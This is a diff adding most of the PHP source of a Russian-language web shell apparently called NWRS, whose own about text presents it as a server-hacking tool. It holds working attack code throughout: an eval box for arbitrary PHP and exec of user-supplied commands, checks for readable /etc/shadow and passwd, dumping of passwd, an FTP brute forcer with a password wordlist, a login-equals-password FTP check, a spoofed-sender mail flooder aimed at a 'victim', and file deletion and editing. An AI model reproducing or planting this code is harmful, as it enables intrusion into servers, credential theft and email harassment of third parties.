+print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+mysql_free_result($c);
+}
+} #end base
+
+@$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Áàçà äàííûõ: $db => $vn</font>";
+@$inside=$_GET['inside'];
+@$tbl=$_GET['tbl'];
+if($inside){
+print "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
+print "
+Âñåãî: $cfa[0]<form>
+<input type=hidden name=ac value=sql>
+Îò: <input name=from size=3 value=0>
+Äî: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value=Ïîêàçàòü>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+ [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Çàãðóçèòü</a>]
+</form>";
+@$vn=$_GET['vn'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
+}
+print "</tr>";
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+print "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
+} print "</tr>";
+}
+mysql_free_result($result);
+print "</table>";
+
+} #end inside
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+
+
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå php-êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïðàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïðàâëåíî!</h2>";
+}
+break;
+
+
+// Èíôîðìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëþ÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëþ÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîðìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåðâåðà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåðâåð: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Ïðîöåññîð:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
+echo "<b>Ïðèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Ñâîáîäíî</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web-ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version: </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïðîöåñà: </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow!</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow-!</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêðûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêðûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ðåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóðàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêðèïòå
+case "about":
+
+echo "<center><b>Ïðèâåò âñåì!</b><br><br>
+Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà.  òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè.
+Íó, è ñïàñèáî ýòèì ëþäÿì:  Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!<br><br><b>Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå.</b></center>";
+echo "<center><br><br><em>Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:</em><br><br>
+<a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
+<a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
+<a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
+<a href='http://www.hackru.info'>www.hackru.info</a><br><br>
+<a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
+<a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
+Èçâèíÿþñü, åñëè êîãî çàáûë.<br> <em>Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì </em>:)
+<br><br><br><br><br><b>Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL<br> 22 Èþëÿ 2005 ã. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
+break;
+
+// ÔÒÏ ïîäáîð ïàðîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïðîâåðèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàðîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàðîëü äëÿ ïðîâåðêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='testing' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõðàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íè÷åãî íåò";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$testing";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($number,$number);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.</font></b><br>
+&nbsp;&nbsp;Êîííåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàðîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà <b><u>$host</u></b> çàêðûò 21 ïîðò!</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåðòâû
+$from=$_POST['from']; // Ìûëî æåðòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïðåäåëÿåò äëèíó òåêñòà + 1 (ïðîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåðòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåðòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ëèïîâîãî ìûëà</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àðõèâàöèÿ äèðåêòîðèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àðõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àðõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Íà÷àòü'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïðîñìîòð </a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ðåäàêòèðîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãðóçèòü</a>]<br>";
+if(@$_GET['download']){
+@$download=$_GET['download'];
+@$d=$_GET['d'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+//if($os=="unix"){ echo "
+//<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+//<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";}
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?ac=navigation&d=$d'>No</a><br><br>
+";
+exit;
+}
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?ac=navigation&d=".@$x."'\">";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñðåäñòâî çàìåíû:<br>
+(òû ìîæåøü çàìåíèòü ëþáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP<br>
+2. IP microsoft.com :)<br>
+Çàìåíÿòü ýòî <input name=this size=30 value=$ip> ýòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòðåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="$d/$e óäàëåí! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåðæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: òû óâåðåí?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ðåäàêòèðîâàíèå:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõðàíèòü èçìåíåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><center><b>Òèï</b></td><td bgcolor=#4d9ef0><b>Ðàçìåð</b></td><td bgcolor=#4d9ef0><center><b>Âëàäåëåö/Ãðóïïà</b></td><td bgcolor=#4d9ef0><b>Ïðàâà</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí!</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
